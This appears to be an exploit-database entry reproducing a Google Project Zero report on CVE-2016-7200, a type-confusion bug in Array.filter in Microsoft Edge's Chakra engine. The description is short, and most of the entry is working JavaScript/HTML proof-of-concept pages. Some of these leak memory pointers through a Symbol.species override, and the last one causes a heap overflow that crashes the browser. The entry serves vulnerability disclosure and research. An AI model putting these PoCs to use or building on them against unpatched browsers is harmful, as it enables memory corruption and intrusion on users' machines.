Microsoft Edge - 'Array.filter' Info Leak



EKU-ID: 6063 CVE: 2016-7200 OSVDB-ID:
Author: Google Security Research Published: 2016-11-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=922
 
There is an info leak in Array.filter. In Chakra, the destination array that arrays are filtered into is initialized using ArraySpeciesCreate, which can create both native and variable arrays. However, the loop that calls the filter function assumes that the destination array is a variable array, and sets each value using DirectSetItemAt, which is unsafe, and can lead to a var pointer being written to an integer array. A PoC is as follows and attached:
 
 
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
 
    constructor(){
 
        return d;
        }
}
 
class MyArray extends Array {
 
  static get [Symbol.species]() {
  return dummy;
}
}
 
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
 
function test(i){
 
    return true;   
}
 
 
a.__proto__ = MyArray.prototype;
 
var o = a.filter(test);
var h = [];
 
for(item in o){
 
    var n = new Number(o[item]);
    if (n < 0){
        n = n + 0x100000000;
    }
    h.push(n.toString(16));
 
}
 
alert(h);
 
<html><body><script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
 
    constructor(){
        alert("in constructor");
        return d;
        }
 
}
 
class MyArray extends Array {
  // Overwrite species to the parent Array constructor
  static get [Symbol.species]() {
 
    alert("get");
        b[0] = {};
  return dummy; }
}
 
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
 
 
function test(i){
 
    return true;   
 
}
 
 
 
a.__proto__ = MyArray.prototype;
 
var o = a.filter(test);
alert(o);
var h = [];
 
for(item in o){
 
    var n = new Number(o[item]);
    if (n < 0){
        n = n + 0x100000000;
    }
    h.push(n.toString(16));
 
}
 
alert(h);
 
</script></body></html>
 
https://bugs.chromium.org/p/project-zero/issues/detail?id=922#c1
 
I looked a bit more into this issue, and I think it can actually be used to corrupt the heap too. The issue is that DirectSetItemAt is called on an int array when it thinks it's a Var array. But since elements of a Var array are twice as wide as elements of the int array, setting items at indexes larger than half the array length will write outside of the allocated array. I've attached a sample that crashes Edge and demonstrates the overflow.
-->
 
<html>
<body>
<script>
 
var b = new Array(1,2,3);
var d = new Array(1,2,3);
d.length = 0x200000;
d.fill(7);
class dummy{
 
    constructor(){
        alert("in constructor");
        return d;
        }
 
}
 
class MyArray extends Array {
  // Overwrite species to the parent Array constructor
  static get [Symbol.species]() {
 
    alert("get");
        b[0] = {};
  return dummy; }
}
 
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
 
for(var i = 0; i < 0x200000; i++){
    a[i] = i;
 
}
 
function test(i){
 
    return true;   
 
}
 
 
 
a.__proto__ = MyArray.prototype;
 
var o = a.filter(test);
alert(o);
var h = [];
 
for(item in o){
 
    var n = new Number(o[item]);
    if (n < 0){
        n = n + 0x100000000;
    }
    h.push(n.toString(16));
 
}
 
alert(h);
 
</script>
</body>
</html>